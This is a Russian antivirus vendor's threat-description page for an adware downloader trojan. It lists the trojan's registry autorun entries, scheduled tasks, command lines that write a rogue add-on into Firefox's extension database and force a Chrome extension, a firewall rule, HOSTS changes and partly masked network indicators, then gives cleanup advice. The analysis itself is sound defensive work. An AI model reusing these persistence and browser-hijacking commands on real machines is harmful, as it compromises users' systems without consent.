Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.DownLoader12.50314
Добавлен в вирусную базу Dr.Web:
2015-03-27
Описание добавлено:
2015-03-27
Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Bench Communicator Watcher' = '%PROGRAM_FILES%\Bench\Proxy\pwdg.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Bench Settings Cleaner' = '%PROGRAM_FILES%\Bench\Proxy\cl.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'BrowserProtector' = ''
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'BrowserProtector-repairJob' = 'wscript.exe "<LS_APPDATA>\BrowserProtector\repair.js" "BrowserProtector-repairJob"'
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'BService' = '%PROGRAM_FILES%\Bench\BService\1.1\bservice.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Wd' = '%PROGRAM_FILES%\Bench\Wd\wd.exe'
Creates or modifies the following files:
%WINDIR%\Tasks\bench-S-1-5-21-2832440558-3064306045-1455513625-1000.job
%WINDIR%\Tasks\bench-sys.job
Malicious functions:
Creates and executes the following:
'%PROGRAM_FILES%\Bench\Updater\1.7.0.0\updater.exe'
'<LS_APPDATA>\BrowserProtector\SoftwareDetector.exe' "%APPDATA%\Roaming\Mozilla\Firefox\Profiles\fzv9i9tr.default\extensions.sqlite" " INSERT OR REPLACE INTO addon ( id, location, version, type, iconURL, defaultLocale, visible, active, userDisabled, appDisabled, pendingUninstall, applyBackgroundUpdates, bootstrap, skinnable, softDisabled ) VALUES ( '{3835A3E2-FE60-C529-D8E7-49A1C5A0221C}', 'app-profile', '1.0', 'extension', 'chrome://framework-3835a3e2-fe60-c529-d8e7-49a1c5a0221c/content/icons/icon32.png', '24', 1, 1, 0, 0, 0, 1, 1, 0, 0 ) "
'<LS_APPDATA>\BrowserProtector\sqlite3.exe' "%APPDATA%\Roaming\Mozilla\Firefox\Profiles\fzv9i9tr.default\extensions.sqlite" " SELECT internal_id FROM addon WHERE id = '{3835A3E2-FE60-C529-D8E7-49A1C5A0221C}' "
'%TEMP%\nsxB3F4.tmp\ns83C7.tmp' "<SYSTEM32>\cscript.exe" //Nologo "chrome_gp_update.js" /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="12199" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'%PROGRAM_FILES%\Bench\BService\1.1\bservice.exe'
'%PROGRAM_FILES%\Bench\Wd\wd.exe'
'%PROGRAM_FILES%\Bench\Proxy\pwdg.exe'
'%PROGRAM_FILES%\Bench\Updater\1.7.0.0\updater.exe' 0x8e8 updater.exe
'<LS_APPDATA>\BrowserProtector\sqlite3.exe' /pid=0xee4 /log
'<LS_APPDATA>\BrowserProtector\sqlite3.exe' "%APPDATA%\Roaming\Mozilla\Firefox\Profiles\fzv9i9tr.default\extensions.sqlite" " UPDATE addon SET defaultLocale = WHERE internal_id="
'<LS_APPDATA>\BrowserProtector\sqlite3.exe' "%APPDATA%\Roaming\Mozilla\Firefox\Profiles\fzv9i9tr.default\extensions.sqlite" " INSERT OR REPLACE INTO locale VALUES (,'BrowserProtector','BrowserProtector',null,null) "
'<LS_APPDATA>\BrowserProtector\SoftwareDetector.exe' "%APPDATA%\Roaming\Mozilla\Firefox\Profiles\fzv9i9tr.default\extensions.sqlite" " INSERT OR REPLACE INTO targetApplication VALUES ('', '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}', '8.0', '20.*') "
'<LS_APPDATA>\BrowserProtector\gpedit.exe' chrome add-extension didfkdocpogamfcjniohejkbmfkaccbm http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo
'<LS_APPDATA>\BrowserProtector\sqlite3.exe' "%APPDATA%\Roaming\Mozilla\Firefox\Profiles\fzv9i9tr.default\framework-3835a3e2-fe60-c529-d8e7-49a1c5a0221c.sqlite" "SELECT value FROM user_storage WHERE key='_GPL_zoneid';"
'%TEMP%\nsxB3F4.tmp\ns2495.tmp' net.exe start schedule
'%PROGRAM_FILES%\Bench\Updater\1.7.0.0\Updater.exe' -runmode=addsystask
'%TEMP%\nsxB3F4.tmp\nsECB0.tmp' "<SYSTEM32>\cscript.exe" //Nologo "migrate.js" /iversion=20141023 /programfiles="%PROGRAM_FILES%" /localapps="<LS_APPDATA>" /chrome-dir="" /firefox-dir="<LS_APPDATA>\BrowserProtector\firefox" /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'<LS_APPDATA>\BrowserProtector\SoftwareDetector.exe'
'<LS_APPDATA>\BrowserProtector\sqlite3.exe' "<LS_APPDATA>\Google\Chrome\User Data\Default\Local Storage\chrome-extension_didfkdocpogamfcjniohejkbmfkaccbm_0.localstorage" "SELECT value FROM ItemTable WHERE key='_GPL_zoneid';"
'%PROGRAM_FILES%\Bench\Updater\1.7.0.0\updater.exe' -runmode=addproduct -info="%TEMP%\nsh2407.tmp"
'%TEMP%\nsxB3F4.tmp\ns4ABB.tmp' "<SYSTEM32>\cscript.exe" //Nologo "main_installer.js" install /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="12199" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'%TEMP%\nsxB3F4.tmp\ns5E1D.tmp' "<SYSTEM32>\cscript.exe" //Nologo "installer.js" install chrome "" /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="12199" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'%PROGRAM_FILES%\Bench\Updater\updater.exe' -runmode=addtask
'%PROGRAM_FILES%\Bench\Updater\1.7.0.0\updater.exe' -runmode=addtask
'%PROGRAM_FILES%\Bench\Updater\updater.exe' -runmode=addproduct -info="%TEMP%\nsh2407.tmp"
Executes the following:
'<SYSTEM32>\conhost.exe' netsh advfirewall firewall add rule name="pwdg.exe" protocol=TCP dir=in localip=127.0.0.1 remoteip=127.0.0.1 localport=3128 action=allow program="%PROGRAM_FILES%\Bench\Proxy\pwdg.exe"
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="pwdg.exe" protocol=TCP dir=in localip=127.0.0.1 remoteip=127.0.0.1 localport=3128 action=allow program="%PROGRAM_FILES%\Bench\Proxy\pwdg.exe"
'<SYSTEM32>\conhost.exe' "<SYSTEM32>\cscript.exe" //Nologo "installer.js" install firefox "<LS_APPDATA>\BrowserProtector\firefox\" /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="12199" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'<SYSTEM32>\conhost.exe' //Nologo "installer.js" install firefox "<LS_APPDATA>\BrowserProtector\firefox\" /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="12199" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'<SYSTEM32>\RAServer.exe' /offerraupdate
'<SYSTEM32>\svchost.exe' /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
'<SYSTEM32>\cscript.exe' /pid=0x300 /log
'<SYSTEM32>\conhost.exe' -runmode=addproduct -info="<LS_APPDATA>\BrowserProtector\info.xml"
'<SYSTEM32>\cscript.exe' //Nologo "main_installer.js" install /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="12199" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'<SYSTEM32>\cscript.exe' //Nologo "installer.js" install chrome "" /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="12199" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'<SYSTEM32>\cscript.exe' //Nologo "migrate.js" /iversion=20141023 /programfiles="%PROGRAM_FILES%" /localapps="<LS_APPDATA>" /chrome-dir="" /firefox-dir="<LS_APPDATA>\BrowserProtector\firefox" /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'<SYSTEM32>\net1.exe' start schedule
'<SYSTEM32>\cscript.exe' //Nologo "chrome_gp_update.js" /product-name="BrowserProtector" /installation-time="1427426041" /pid="2235" /zone="20324582" /czoneid="12199" /nmhost-dir="%PROGRAM_FILES%\Bench\NmHost" /app-id="38995" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="didfkdocpogamfcjniohejkbmfkaccbm" /chrome-update-url="http://di########gamfcjniohejkbmfkaccbm/check/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo" /close-chrome /close-firefox
'<SYSTEM32>\taskhost.exe' SYSTEM
'<SYSTEM32>\cscript.exe' /pid=0x3c4 /log
'<SYSTEM32>\svchost.exe' -k secsvcs
Terminates or attempts to terminate
the following user processes:
Modifies file system :
Creates the following files:
Deletes the following files:
<LS_APPDATA>\BrowserProtector\info.xml
%TEMP%\nsxB3F4.tmp\md5dll.dll
%TEMP%\nsxB3F4.tmp\nsA167.tmp
%TEMP%\nsxB3F4.tmp\nsAF4D.tmp
%TEMP%\nsxB3F4.tmp\nsProcess.dll
%TEMP%\nsxB3F4.tmp\System.dll
%TEMP%\nsxB3F4.tmp\nsDownloadCv.dll
%TEMP%\nsxB3F4.tmp\nsExec.dll
%TEMP%\nsh2407.tmp
%TEMP%\nsxB3F4.tmp\ns4ABB.tmp
%TEMP%\nsxB3F4.tmp\nsECB0.tmp
%TEMP%\nsxB3F4.tmp\ns2495.tmp
%APPDATA%\Roaming\Mozilla\Firefox\Profiles\fzv9i9tr.default\extensions.sqlite-journal
%TEMP%\nsxB3F4.tmp\ns8963.tmp
%TEMP%\nsxB3F4.tmp\ns5E1D.tmp
%TEMP%\nsxB3F4.tmp\ns83C7.tmp
Modifies the HOSTS file.
Network activity:
Connects to:
'localhost':3128
'54.##4.28.26':80
TCP:
HTTP GET requests:
http://di########gamfcjniohejkbmfkaccbm/latest/crx/.eJwNyUsOgCAMANG7dE2MbrmMgVKk_GoAjYnx7rKcNy8M0xNowNCkECi4qXWWOmlb1tlc-zA5UwM92kUK6Bk7u_kdO5-c4CmHKR5jZQkUky0-GURb4PsB3FkhDw.Dhke54F1A0E9jxnwrboaY7aPTMo via 54.##4.28.26
UDP:
DNS ASK br#######otector-a.akamaihd.net
DNS ASK co######ache-a.akamaihd.net
DNS ASK www.in####lping5.info
DNS ASK dn#.##ftncsi.com
Miscellaneous:
Searches for the following windows:
ClassName: '' WindowName: 'BrowserProtector Tray Icon'
ClassName: 'Shell_TrayWnd' WindowName: ''
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK